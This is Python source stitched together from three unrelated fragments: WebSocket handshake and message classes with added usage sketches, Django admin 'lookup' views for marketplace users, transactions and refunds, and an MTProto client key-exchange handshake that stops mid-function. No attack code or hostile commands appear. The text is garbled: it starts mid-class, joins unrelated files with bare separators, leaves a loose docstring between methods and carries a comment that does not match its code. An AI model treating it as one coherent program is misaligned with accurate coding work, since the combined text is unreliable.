'extensions': self.extensions}
def __str__(self):
return json.dumps(self.__json__())
class ConnectionAccept(object):
"""
Used by WebSocket servers to accept an incoming WebSocket connection.
If the client announced one or multiple subprotocols, the server MUST
select one of the subprotocols announced by the client.
"""
__slots__ = ('subprotocol', 'headers')
def __init__(self, subprotocol=None, headers=None):
"""
:param subprotocol: The WebSocket connection is accepted with
this WebSocket subprotocol chosen. The value must be a token
as defined by RFC 2616.
:type subprotocol: unicode or None
:param headers: Additional HTTP headers to send on the WebSocket
opening handshake reply, e.g. cookies. The keys must be unicode,
and the values either unicode or tuple/list. In the latter case
a separate HTTP header line will be sent for each item in
tuple/list.
:type headers: dict or None
"""
assert(subprotocol is None or type(subprotocol) == six.text_type)
assert(headers is None or type(headers) == dict)
if headers is not None:
for k, v in headers.items():
assert(type(k) == six.text_type)
assert(type(v) == six.text_type or type(v) == list or type(v) == tuple)
if type(v) == list or type(v) == tuple:
for vv in v:
assert(type(vv) == six.text_type)
self.subprotocol = subprotocol
self.headers = headers
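# Illustrative usage sketch (added for exposition; not part of the original
# module): accept a connection with a chosen subprotocol and an extra cookie
# header. The subprotocol name and header value are arbitrary examples; they
# must satisfy the type asserts in ConnectionAccept.__init__.
def _example_connection_accept():
    return ConnectionAccept(subprotocol=u'wamp.2.json',
                            headers={u'Set-Cookie': u'session=abc123'})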
class ConnectionDeny(Exception):
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.protocol.WebSocketServerProtocol.onConnect`.
"""
__slots__ = ('code', 'reason')
BAD_REQUEST = 400
"""
Bad Request. The request cannot be fulfilled due to bad syntax.
"""
FORBIDDEN = 403
"""
Forbidden. The request was a legal request, but the server is refusing to respond to it. Unlike a 401 Unauthorized response, authenticating will make no difference.
"""
NOT_FOUND = 404
"""
Not Found. The requested resource could not be found but may be available again in the future. Subsequent requests by the client are permissible.
"""
NOT_ACCEPTABLE = 406
"""
Not Acceptable. The requested resource is only capable of generating content not acceptable according to the Accept headers sent in the request.
"""
REQUEST_TIMEOUT = 408
"""
Request Timeout. The server timed out waiting for the request. According to W3 HTTP specifications: 'The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.'
"""
INTERNAL_SERVER_ERROR = 500
"""
Internal Server Error. A generic error message, given when no more specific message is suitable.
"""
NOT_IMPLEMENTED = 501
"""
Not Implemented. The server either does not recognize the request method, or it lacks the ability to fulfill the request.
"""
SERVICE_UNAVAILABLE = 503
"""
Service Unavailable. The server is currently unavailable (because it is overloaded or down for maintenance). Generally, this is a temporary state.
"""
def __init__(self, code, reason=None):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: unicode
"""
assert(type(code) == int)
assert(reason is None or type(reason) == six.text_type)
self.code = code
self.reason = reason
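# Illustrative usage sketch (added for exposition; not part of the original
# module): deny a handshake from onConnect by raising ConnectionDeny, as
# described in the class docstring. The reason text is an arbitrary example.
def _example_connection_deny():
    raise ConnectionDeny(ConnectionDeny.FORBIDDEN, reason=u'origin not allowed')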
class Message(object):
"""
Abstract base class for WebSocket messages.
"""
__slots__ = ()
class IncomingMessage(Message):
"""
An incoming WebSocket message.
"""
__slots__ = ('payload', 'is_binary')
def __init__(self, payload, is_binary=False):
"""
:param payload: The WebSocket message payload, which can be UTF-8
encoded text or a binary string.
:type payload: bytes
:param is_binary: ``True`` iff payload is binary, else the payload
contains UTF-8 encoded text.
:type is_binary: bool
"""
assert(type(payload) == bytes)
assert(type(is_binary) == bool)
self.payload = payload
self.is_binary = is_binary
class OutgoingMessage(Message):
"""
An outgoing WebSocket message.
"""
__slots__ = ('payload', 'is_binary', 'dont_compress')
def __init__(self, payload, is_binary=False, dont_compress=False):
"""
:param payload: The WebSocket message payload, which can be UTF-8
encoded text or a binary string.
:type payload: bytes
:param is_binary: ``True`` iff payload is binary, else the payload
contains UTF-8 encoded text.
:type is_binary: bool
:param dont_compress: Iff ``True``, never compress this message.
This only has an effect when WebSocket compression has been negotiated
on the WebSocket connection. Use when you know the payload is
incompressible (e.g. encrypted or already compressed).
:type dont_compress: bool
"""
assert(type(payload) == bytes)
assert(type(is_binary) == bool)
assert(type(dont_compress) == bool)
self.payload = payload
self.is_binary = is_binary
self.dont_compress = dont_compress
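# Illustrative usage sketch (added for exposition; not part of the original
# module): wrap an already-compressed binary payload and ask the framing
# layer to skip per-message compression, as described in the dont_compress
# docstring above. The payload bytes are an arbitrary example.
def _example_outgoing_message():
    return OutgoingMessage(b'\x1f\x8b\x08\x00', is_binary=True,
                           dont_compress=True)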
class Ping(object):
"""
A WebSocket ping message.
"""
__slots__ = ('payload',)
def __init__(self, payload=None):
"""
:param payload: The WebSocket ping message payload.
:type payload: bytes or None
"""
assert(payload is None or type(payload) == bytes), \
("invalid type {} for WebSocket ping payload - must be None or bytes".format(type(payload)))
if payload is not None:
assert(len(payload) < 126), \
("WebSocket ping payload too long ({} bytes) - must be <= 125 bytes".format(len(payload)))
self.payload = payload
|
|
import json
import uuid
from datetime import datetime, timedelta
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import connection
from django.db.models import Count, Q, Sum
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.http import require_POST
import commonware.log
from babel import numbers
from elasticsearch_dsl import Q as ES_Q, query
from slumber.exceptions import HttpClientError, HttpServerError
from tower import ugettext as _
import mkt
import mkt.constants.lookup as lkp
from lib.pay_server import client
from mkt.access import acl
from mkt.account.utils import purchase_list
from mkt.api.authorization import GroupPermission
from mkt.constants.payments import (COMPLETED, FAILED, PENDING, PROVIDER_BANGO,
PROVIDER_LOOKUP, SOLITUDE_REFUND_STATUSES)
from mkt.developers.models import ActivityLog, AddonPaymentAccount
from mkt.developers.providers import get_provider
from mkt.developers.utils import prioritize_app
from mkt.developers.views_payments import _redirect_to_bango_portal
from mkt.lookup.forms import (APIFileStatusForm, APIStatusForm, DeleteUserForm,
TransactionRefundForm, TransactionSearchForm,
PromoImgForm)
from mkt.lookup.serializers import AppLookupSerializer, WebsiteLookupSerializer
from mkt.prices.models import AddonPaymentData, Refund
from mkt.purchase.models import Contribution
from mkt.reviewers.models import QUEUE_TARAKO
from mkt.search.filters import SearchQueryFilter
from mkt.search.views import SearchView
from mkt.site.decorators import json_view, permission_required
from mkt.site.utils import paginate
from mkt.tags.models import attach_tags
from mkt.users.models import UserProfile
from mkt.webapps.models import Webapp
from mkt.websites.models import Website
from mkt.websites.forms import WebsiteForm
from mkt.websites.views import WebsiteSearchView
log = commonware.log.getLogger('z.lookup')
@permission_required([('Lookup', 'View')])
def home(request):
tx_form = TransactionSearchForm()
return render(request, 'lookup/home.html', {'tx_form': tx_form})
@permission_required([('AccountLookup', 'View')])
def user_summary(request, user_id):
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
app_summary = _app_summary(user.pk)
# All refunds that this user has requested (probably as a consumer).
req = Refund.objects.filter(contribution__user=user)
# All instantly-approved refunds that this user has requested.
appr = req.filter(status=mkt.REFUND_APPROVED_INSTANT)
refund_summary = {'approved': appr.count(),
'requested': req.count()}
user_addons = user.addons.order_by('-created')
user_addons = paginate(request, user_addons, per_page=15)
payment_data = (AddonPaymentData.objects.filter(addon__authors=user)
.values(*AddonPaymentData.address_fields())
.distinct())
# If the user is deleted, get the log detailing the delete.
try:
delete_log = ActivityLog.objects.for_user(user).filter(
action=mkt.LOG.DELETE_USER_LOOKUP.id)[0]
except IndexError:
delete_log = None
provider_portals = get_payment_provider_portals(user=user)
return render(request, 'lookup/user_summary.html',
{'account': user, 'app_summary': app_summary,
'delete_form': DeleteUserForm(), 'delete_log': delete_log,
'is_admin': is_admin, 'refund_summary': refund_summary,
'user_addons': user_addons, 'payment_data': payment_data,
'provider_portals': provider_portals})
@permission_required([('AccountLookup', 'View')])
def user_delete(request, user_id):
delete_form = DeleteUserForm(request.POST)
if not delete_form.is_valid():
messages.error(request, delete_form.errors)
return HttpResponseRedirect(reverse('lookup.user_summary',
args=[user_id]))
user = get_object_or_404(UserProfile, pk=user_id)
user.deleted = True
user.save() # Must call the save function to delete user.
mkt.log(mkt.LOG.DELETE_USER_LOOKUP, user,
details={'reason': delete_form.cleaned_data['delete_reason']},
user=request.user)
return HttpResponseRedirect(reverse('lookup.user_summary', args=[user_id]))
@permission_required([('Transaction', 'View')])
def transaction_summary(request, tx_uuid):
tx_data = _transaction_summary(tx_uuid)
if not tx_data:
raise Http404
tx_form = TransactionSearchForm()
tx_refund_form = TransactionRefundForm()
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_form': tx_form,
'tx_refund_form': tx_refund_form}.items() +
tx_data.items()))
def _transaction_summary(tx_uuid):
"""Get transaction details from Solitude API."""
contrib = get_object_or_404(Contribution, uuid=tx_uuid)
contrib_id = contrib.transaction_id
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
lookup = {'status': True, 'transaction': True}
pay = {}
try:
pay = client.api.generic.transaction.get_object_or_404(uuid=contrib_id)
except ObjectDoesNotExist:
log.warning('Transaction not found in solitude: {0}'.format(tx_uuid))
lookup['transaction'] = False
if pay.get('provider') == PROVIDER_BANGO:
# If we are processing a Bango refund, then support would also like to
# know the package id.
try:
pay['package_id'] = (client.api.by_url(pay['seller'])
.get_object_or_404()['bango']['package_id'])
except (KeyError, ObjectDoesNotExist):
log.warning('Failed to find Bango package_id: {0}'.format(tx_uuid))
# Get refund status.
refund_status = None
if refund_contrib and refund_contrib.refund.status == mkt.REFUND_PENDING:
try:
status = client.api.bango.refund.get_object_or_404(
data={'uuid': refund_contrib.transaction_id})
refund_status = SOLITUDE_REFUND_STATUSES[status['status']]
except (KeyError, HttpServerError):
lookup['status'] = False
log.warning('Refund lookup failed: {0}'.format(tx_uuid))
return {
# Solitude data.
'lookup': lookup,
'amount': pay.get('amount'),
'currency': pay.get('currency'),
'package_id': pay.get('package_id'),
'provider': PROVIDER_LOOKUP.get(pay.get('provider')),
'refund_status': refund_status,
'support': pay.get('uid_support'),
'timestamp': pay.get('created'),
# Zamboni data.
'app': contrib.addon,
'contrib': contrib,
'related': contrib.related,
'type': mkt.CONTRIB_TYPES.get(contrib.type, _('Incomplete')),
# Filter what is refundable.
'is_refundable': ((contrib.type == mkt.CONTRIB_PURCHASE) and
not refund_contrib),
}
@require_POST
@permission_required([('Transaction', 'Refund')])
def transaction_refund(request, tx_uuid):
contrib = get_object_or_404(Contribution, uuid=tx_uuid,
type=mkt.CONTRIB_PURCHASE)
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
if refund_contrib:
messages.error(request, _('A refund has already been processed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
form = TransactionRefundForm(request.POST)
if not form.is_valid():
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_refund_form': form,
'tx_form': TransactionSearchForm()}.items() +
_transaction_summary(tx_uuid).items()))
data = {'uuid': contrib.transaction_id,
'manual': form.cleaned_data['manual']}
if settings.BANGO_FAKE_REFUNDS:
data['fake_response_status'] = {'responseCode':
form.cleaned_data['fake']}
try:
res = client.api.bango.refund.post(data)
except (HttpClientError, HttpServerError):
# Either the refund request was not allowed or Solitude had an issue.
log.exception('Refund error: %s' % tx_uuid)
messages.error(
request,
_('You cannot make a refund request for this transaction.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
if res['status'] in [PENDING, COMPLETED]:
# Create refund Contribution by cloning the payment Contribution.
refund_contrib = Contribution.objects.get(id=contrib.id)
refund_contrib.id = None
refund_contrib.save()
log.info('Creating refund transaction from: {0} '
'with transaction_id of: {1}'
.format(contrib.id, res['uuid']))
refund_contrib.update(
type=mkt.CONTRIB_REFUND, related=contrib,
uuid=str(uuid.uuid4()),
amount=-refund_contrib.amount if refund_contrib.amount else None,
transaction_id=res['uuid'])
if res['status'] == PENDING:
# Create pending Refund.
refund_contrib.enqueue_refund(
mkt.REFUND_PENDING, request.user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund pending: %s' % tx_uuid)
messages.success(
request, _('Refund for this transaction now pending.'))
elif res['status'] == COMPLETED:
# Create approved Refund.
refund_contrib.enqueue_refund(
mkt.REFUND_APPROVED, request.user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund approved: %s' % tx_uuid)
messages.success(
request, _('Refund for this transaction successfully approved.'))
elif res['status'] == FAILED:
# Bango rejected the refund.
log.error('Refund failed: %s' % tx_uuid)
messages.error(
request, _('Refund request for this transaction failed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
@permission_required([('AppLookup', 'View')])
def app_summary(request, addon_id):
app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
if request.FILES:
promo_img_form = PromoImgForm(request.POST, request.FILES)
else:
promo_img_form = PromoImgForm()
if 'promo_img' in request.FILES and promo_img_form.is_valid():
promo_img_form.save(app)
messages.success(request, 'Promo image successfully uploaded.')
return redirect(reverse('lookup.app_summary', args=[app.pk]))
if 'prioritize' in request.POST and not app.priority_review:
prioritize_app(app, request.user)
authors = (app.authors.filter(addonuser__role__in=(mkt.AUTHOR_ROLE_DEV,
mkt.AUTHOR_ROLE_OWNER))
.order_by('display_name'))
if app.premium and app.premium.price:
price = app.premium.price
else:
price = None
purchases, refunds = _app_purchases_and_refunds(app)
provider_portals = get_payment_provider_portals(app=app)
versions = None
status_form = APIStatusForm(initial={
'status': mkt.STATUS_CHOICES_API[app.status]
})
version_status_forms = {}
if app.is_packaged:
versions = app.versions.all().order_by('-created')
for v in versions:
version_status_forms[v.pk] = APIFileStatusForm(initial={
'status': mkt.STATUS_CHOICES_API[v.all_files[0].status]
})
permissions = {}
if app.latest_version:
permissions = app.latest_version.manifest.get('permissions', {})
return render(request, 'lookup/app_summary.html', {
'abuse_reports': app.abuse_reports.count(), 'app': app,
'authors': authors, 'purchases': purchases, 'refunds': refunds,
'price': price, 'provider_portals': provider_portals,
'status_form': status_form, 'versions': versions,
'is_tarako': app.tags.filter(tag_text=QUEUE_TARAKO).exists(),
'tarako_review':
app.additionalreview_set.latest_for_queue(QUEUE_TARAKO),
'version_status_forms': version_status_forms,
'permissions': permissions,
'promo_img_form': promo_img_form,
})
@permission_required([('WebsiteLookup', 'View')])
def website_summary(request, addon_id):
website = get_object_or_404(Website, pk=addon_id)
if request.FILES:
promo_img_form = PromoImgForm(request.POST, request.FILES)
else:
promo_img_form = PromoImgForm()
if 'promo_img' in request.FILES and promo_img_form.is_valid():
promo_img_form.save(website)
messages.success(request, 'Promo image successfully uploaded.')
return redirect(reverse('lookup.website_summary', args=[website.pk]))
if not hasattr(website, 'keywords_list'):
attach_tags([website])
return render(request, 'lookup/website_summary.html', {
'website': website,
'promo_img_form': promo_img_form,
})
@permission_required([('WebsiteLookup', 'View')])
def website_edit(request, addon_id):
website = get_object_or_404(Website, pk=addon_id)
form = WebsiteForm(request.POST or None, request=request, instance=website)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Website saved.'))
return redirect(
reverse('lookup.website_summary', args=[website.pk]))
return render(request, 'lookup/website_edit.html', {
'website': website,
'form': form,
})
@permission_required([('AccountLookup', 'View')])
def app_activity(request, addon_id):
"""Shows the app activity age for single app."""
app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
user_items = ActivityLog.objects.for_apps([app]).exclude(
action__in=mkt.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_apps([app]).filter(
action__in=mkt.LOG_HIDE_DEVELOPER)
user_items = paginate(request, user_items, per_page=20)
admin_items = paginate(request, admin_items, per_page=20)
return render(request, 'lookup/app_activity.html', {
'admin_items': admin_items, 'app': app, 'user_items': user_items})
@permission_required([('BangoPortal', 'Redirect')])
def bango_portal_from_package(request, package_id):
response = _redirect_to_bango_portal(package_id,
'package_id: %s' % package_id)
if 'Location' in response:
return HttpResponseRedirect(response['Location'])
else:
message = (json.loads(response.content)
.get('__all__', response.content)[0])
messages.error(request, message)
return HttpResponseRedirect(reverse('lookup.home'))
@permission_required([('AccountLookup', 'View')])
def user_purchases(request, user_id):
"""Shows the purchase page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
products = purchase_list(request, user)
return render(request, 'lookup/user_purchases.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'single': bool(None), 'show_link': False})
@permission_required([('AccountLookup', 'View')])
def user_activity(request, user_id):
"""Shows the user activity page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
products = purchase_list(request, user)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
user_items = ActivityLog.objects.for_user(user).exclude(
action__in=mkt.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_user(user).filter(
action__in=mkt.LOG_HIDE_DEVELOPER)
mkt.log(mkt.LOG.ADMIN_VIEWED_LOG, request.user, user=user)
return render(request, 'lookup/user_activity.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'single': bool(None),
'user_items': user_items, 'admin_items': admin_items,
'show_link': False})
def _expand_query(q, fields):
should = []
for field in fields:
should.append(ES_Q('term', **{field: {'value': q, 'boost': 10}}))
should.append(ES_Q('match', **{field: {'query': q, 'boost': 4,
'type': 'phrase'}}))
should.append(ES_Q('match', **{field: {'query': q, 'boost': 3}}))
should.append(ES_Q('fuzzy', **{field: {'value': q, 'boost': 2,
'prefix_length': 4}}))
should.append(ES_Q('prefix', **{field: {'value': q, 'boost': 1.5}}))
return query.Bool(should=should)
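# A rough sketch (illustrative only) of what _expand_query returns: for
# q='calc' and fields=('name',) the Bool query ORs a strongly boosted exact
# term, a phrase match, a plain match, a fuzzy match and a prefix match, i.e.
#   query.Bool(should=[ES_Q('term', name={'value': 'calc', 'boost': 10}),
#                      ES_Q('match', name={'query': 'calc', 'boost': 4,
#                                          'type': 'phrase'}),
#                      ES_Q('match', name={'query': 'calc', 'boost': 3}),
#                      ES_Q('fuzzy', name={'value': 'calc', 'boost': 2,
#                                          'prefix_length': 4}),
#                      ES_Q('prefix', name={'value': 'calc', 'boost': 1.5})])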
@permission_required([('AccountLookup', 'View')])
@json_view
def user_search(request):
results = []
q = request.GET.get('q', u'').lower().strip()
search_fields = ('fxa_uid', 'display_name', 'email')
fields = ('id',) + search_fields
if q.isnumeric():
        # id is added implicitly by the ES filter. Add it explicitly:
qs = UserProfile.objects.filter(pk=q).values(*fields)
else:
qs = UserProfile.objects.all()
filters = Q()
for field in search_fields:
filters = filters | Q(**{'%s__icontains' % field: q})
qs = qs.filter(filters)
qs = qs.values(*fields)
qs = _slice_results(request, qs)
for user in qs:
user['url'] = reverse('lookup.user_summary', args=[user['id']])
results.append(user)
return {'objects': results}
@permission_required([('Transaction', 'View')])
def transaction_search(request):
tx_form = TransactionSearchForm(request.GET)
if tx_form.is_valid():
return redirect(reverse('lookup.transaction_summary',
args=[tx_form.cleaned_data['q']]))
else:
return render(request, 'lookup/home.html', {'tx_form': tx_form})
class AppLookupSearchView(SearchView):
permission_classes = [GroupPermission('AppLookup', 'View')]
filter_backends = [SearchQueryFilter]
serializer_class = AppLookupSerializer
paginate_by = lkp.SEARCH_LIMIT
max_paginate_by = lkp.MAX_RESULTS
def get_paginate_by(self, *args, **kwargs):
if self.request.GET.get(self.paginate_by_param) == 'max':
return self.max_paginate_by
else:
return super(AppLookupSearchView, self).get_paginate_by(*args,
**kwargs)
class WebsiteLookupSearchView(WebsiteSearchView):
permission_classes = [GroupPermission('WebsiteLookup', 'View')]
filter_backends = [SearchQueryFilter]
serializer_class = WebsiteLookupSerializer
paginate_by = lkp.SEARCH_LIMIT
max_paginate_by = lkp.MAX_RESULTS
def get_paginate_by(self, *args, **kwargs):
if self.request.GET.get(self.paginate_by_param) == 'max':
return self.max_paginate_by
else:
return super(WebsiteLookupSearchView,
self).get_paginate_by(*args, **kwargs)
def _app_summary(user_id):
sql = """
select currency,
sum(case when type=%(purchase)s then 1 else 0 end)
as app_total,
sum(case when type=%(purchase)s then amount else 0.0 end)
as app_amount
from stats_contributions
where user_id=%(user_id)s
group by currency
"""
cursor = connection.cursor()
cursor.execute(sql, {'user_id': user_id,
'purchase': mkt.CONTRIB_PURCHASE})
summary = {'app_total': 0,
'app_amount': {}}
cols = [cd[0] for cd in cursor.description]
while 1:
row = cursor.fetchone()
if not row:
break
row = dict(zip(cols, row))
for cn in cols:
if cn.endswith('total'):
summary[cn] += row[cn]
elif cn.endswith('amount'):
summary[cn][row['currency']] = row[cn]
return summary
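# For illustration (numbers made up): a user with two USD purchases would come
# back as {'app_total': 2, 'app_amount': {'USD': 1.98}}; the per-currency
# breakdown falls out of the GROUP BY currency above.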
def _app_purchases_and_refunds(addon):
purchases = {}
now = datetime.now()
base_qs = (Contribution.objects.values('currency')
.annotate(total=Count('id'),
amount=Sum('amount'))
.filter(addon=addon)
.exclude(type__in=[mkt.CONTRIB_REFUND,
mkt.CONTRIB_CHARGEBACK,
mkt.CONTRIB_PENDING]))
for typ, start_date in (('last_24_hours', now - timedelta(hours=24)),
('last_7_days', now - timedelta(days=7)),
('alltime', None),):
qs = base_qs.all()
if start_date:
qs = qs.filter(created__gte=start_date)
sums = list(qs)
purchases[typ] = {'total': sum(s['total'] for s in sums),
'amounts': [numbers.format_currency(s['amount'],
s['currency'])
for s in sums if s['currency']]}
refunds = {}
rejected_q = Q(status=mkt.REFUND_DECLINED) | Q(status=mkt.REFUND_FAILED)
qs = Refund.objects.filter(contribution__addon=addon)
refunds['requested'] = qs.exclude(rejected_q).count()
percent = 0.0
total = purchases['alltime']['total']
if total:
percent = (refunds['requested'] / float(total)) * 100.0
refunds['percent_of_purchases'] = '%.1f%%' % percent
refunds['auto-approved'] = (qs.filter(status=mkt.REFUND_APPROVED_INSTANT)
.count())
refunds['approved'] = qs.filter(status=mkt.REFUND_APPROVED).count()
refunds['rejected'] = qs.filter(rejected_q).count()
return purchases, refunds
def _slice_results(request, qs):
if request.GET.get('limit') == 'max':
return qs[:lkp.MAX_RESULTS]
else:
return qs[:lkp.SEARCH_LIMIT]
def get_payment_provider_portals(app=None, user=None):
"""
Get a list of dicts describing the payment portals for this app or user.
Either app or user is required.
"""
provider_portals = []
if app:
q = dict(addon=app)
elif user:
q = dict(payment_account__user=user)
else:
raise ValueError('user or app is required')
for acct in (AddonPaymentAccount.objects.filter(**q)
.select_related('payment_account')):
provider = get_provider(id=acct.payment_account.provider)
portal_url = provider.get_portal_url(acct.addon.app_slug)
if portal_url:
provider_portals.append({
'provider': provider,
'app': acct.addon,
'portal_url': portal_url,
'payment_account': acct.payment_account
})
return provider_portals
|
|
import os
import asyncio
import sys
from random import SystemRandom
from io import BytesIO
from socket import socket
from time import time
from collections import namedtuple
from struct import Struct
from urllib.parse import urlsplit
from queue import Queue
from Crypto.PublicKey import RSA
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes
from . util import to_hex, crc32
from . crypt import SHA1
from . import crypt
from . import prime
from . import tl
from . import dc
from . import scheme
from . session import MTProtoSessionData
from . authkey import MTProtoAuthKey, aes_encrypt, aes_decrypt
from .log import log
from .transports import MTProtoTransport
class MTProtoOld:
def __init__(self, api_secret, api_id, rsa_key):
self.api_secret = api_secret
self.api_id = api_id
self.dc = Datacenter(0, Datacenter.DCs_test[1], 443, rsa_key)
class Datacenter:
DATA_VERSION = 4
DCs = [
"149.154.175.50",
"149.154.167.51",
"149.154.175.100",
"149.154.167.91",
"149.154.171.5",
]
DCs_ipv6 = [
"2001:b28:f23d:f001::a",
"2001:67c:4e8:f002::a",
"2001:b28:f23d:f003::a",
"2001:67c:4e8:f004::a",
"2001:b28:f23f:f005::a",
]
DCs_test = [
"149.154.175.10",
"149.154.167.40",
"149.154.175.117",
]
DCs_test_ipv6 = [
"2001:b28:f23d:f001::e",
"2001:67c:4e8:f002::e",
"2001:b28:f23d:f003::e",
]
def __init__(self, dc_id, ipaddr, port, rsa_key):
self.random = SystemRandom()
self.session_id = None
self.resPQ = None
self.p_q_inner_data = None
self.server_DH_params = None
self.server_DH_inner_data = None
self.client_DH_inner_data = None
        self.tmp_aes_key = None
        self.tmp_aes_iv = None
self.set_client_DH_params_answer = None
self.ipaddr = ipaddr
self.port = port
self.datacenter_id = dc_id
self.auth_server_salt_set = []
self._socket = socket()
self._socket.connect((ipaddr, port))
self._socket.settimeout(5.0)
self.socket = self._socket.makefile(mode='rwb', buffering=0)
self.message_queue = []
self.last_message_id = 0
self.timedelta = 0
self.number = 0
self.authorized = False
self.auth_key = MTProtoAuthKey()
self.server_salt = None
self.server_time = None
self.MAX_RETRY = 5
self.AUTH_MAX_RETRY = 5
self.rsa_key = rsa_key
self.b = self.random.getrandbits(2048)
# Handshake
self.create_auth_key()
# self.test_api()
def test_api(self):
getNearestDc = tl.help_getNearestDc()
print(getNearestDc)
self.send_encrypted_message(getNearestDc.to_bytes())
self.recv_encrypted_message()
# nearestDc = tl.NearestDc(self.recv_plaintext_message(True))
# print(nearestDc)
"""
g = public (prime) base, known to Alice, Bob, and Eve. g = 5
p = public (prime) number, known to Alice, Bob, and Eve. p = 23
a = Alice's private key, known only to Alice. a = 6
b = Bob's private key known only to Bob. b = 15
"""
def _req_pq(self):
nonce = tl.int128_c(self.random.getrandbits(128))
request = tl.req_pq(nonce)
        self.send_plaintext_message(request.to_bytes())
        res_pq = tl.ResPQ.from_stream(BytesIO(self.recv_plaintext_message()))
assert nonce == res_pq.nonce
return res_pq
def _create_p_q_inner_data(self):
pq = self.resPQ.pq.to_int('big')
p, q = prime.primefactors(pq)
if p > q:
p, q = q, p
assert p * q == pq and p < q
p_string = tl.string_c.from_int(p, byteorder='big')
q_string = tl.string_c.from_int(q, byteorder='big')
new_nonce = tl.int256_c(self.random.getrandbits(256))
p_q_inner_data = tl.p_q_inner_data_c(pq=self.resPQ.pq, p=p_string, q=q_string, nonce=self.resPQ.nonce, server_nonce=self.resPQ.server_nonce, new_nonce=new_nonce)
assert p_q_inner_data.nonce == self.resPQ.nonce
return p_q_inner_data
def _req_DH_params(self):
key = RSA.importKey(self.rsa_key.strip())
public_key_fingerprint = self.resPQ.server_public_key_fingerprints[0]
data = self.p_q_inner_data.to_boxed_bytes()
sha_digest = SHA1(data)
# get padding of random data to fill what is left after data and sha_digest
random_bytes = os.urandom(255 - len(data) - len(sha_digest))
to_encrypt = sha_digest + data + random_bytes # encrypt cat of sha_digest, data, and padding
encrypted_data = tl.string_c(key.encrypt(to_encrypt, 0)[0]) # rsa encrypt (key == RSA.key)
# Presenting proof of work; Server authentication
req_DH_params = tl.req_DH_params(nonce=self.p_q_inner_data.nonce,
server_nonce=self.p_q_inner_data.server_nonce,
p=self.p_q_inner_data.p, q=self.p_q_inner_data.q,
public_key_fingerprint=public_key_fingerprint,
encrypted_data=encrypted_data)
self.send_plaintext_message(req_DH_params.to_bytes())
server_DH_params = tl.Server_DH_Params.from_stream(BytesIO(self.recv_plaintext_message()))
assert server_DH_params.number == tl.server_DH_params_ok_c.number, "failed to get params"
assert self.resPQ.nonce == server_DH_params.nonce
assert self.resPQ.server_nonce == server_DH_params.server_nonce
return server_DH_params
def _create_tmp_aes_keys(self):
tmp_aes_key = SHA1(self.p_q_inner_data.new_nonce.to_bytes() + self.server_DH_params.server_nonce.to_bytes())
tmp_aes_key += SHA1(self.server_DH_params.server_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())[:12]
tmp_aes_iv = SHA1(self.server_DH_params.server_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())[12:20]
tmp_aes_iv += SHA1(self.p_q_inner_data.new_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())
tmp_aes_iv += self.p_q_inner_data.new_nonce.to_bytes()[0:4]
return tmp_aes_key, tmp_aes_iv
def _decrypt_Server_DH_inner_data(self):
answer_with_hash = crypt.ige_decrypt(self.server_DH_params.encrypted_answer, self.tmp_aes_key, self.tmp_aes_iv)
answer = answer_with_hash[20:] # decrypted at this point
server_DH_inner_data = tl.Server_DH_inner_data.from_stream(BytesIO(answer))
assert self.server_DH_params.nonce == server_DH_inner_data.nonce
assert self.server_DH_params.server_nonce == server_DH_inner_data.server_nonce
return server_DH_inner_data
def _create_client_DH_inner_data(self):
dh_prime = self.server_DH_inner_data.dh_prime.to_int(byteorder='big')
g = self.server_DH_inner_data.g
g_a = self.server_DH_inner_data.g_a.to_int(byteorder='big')
server_time = self.server_DH_inner_data.server_time
self.timedelta = server_time - time() # keep in mind delta is used somewhere later
assert prime.isprime(dh_prime)
retry_id = tl.long_c(0)
b = self.b
g_b = pow(g, b, dh_prime)
g_b_str = tl.bytes_c.from_int(g_b, byteorder='big')
client_DH_inner_data = tl.client_DH_inner_data_c(
nonce=self.server_DH_inner_data.nonce,
server_nonce=self.server_DH_inner_data.server_nonce,
retry_id=retry_id,
g_b=g_b_str)
return client_DH_inner_data
def create_auth_key(self):
self.resPQ = self._req_pq()
print(self.resPQ)
self.p_q_inner_data = self._create_p_q_inner_data()
print(self.p_q_inner_data)
self.server_DH_params = self._req_DH_params()
print(self.server_DH_params)
self.tmp_aes_key, self.tmp_aes_iv = self._create_tmp_aes_keys()
self.server_DH_inner_data = self._decrypt_Server_DH_inner_data()
print(self.server_DH_inner_data)
self.client_DH_inner_data = self._create_client_DH_inner_data()
print(self.client_DH_inner_data)
data = self.client_DH_inner_data.to_boxed_bytes()
data_with_sha = SHA1(data) + data
data_with_sha_padded = data_with_sha + os.urandom(-len(data_with_sha) % 16)
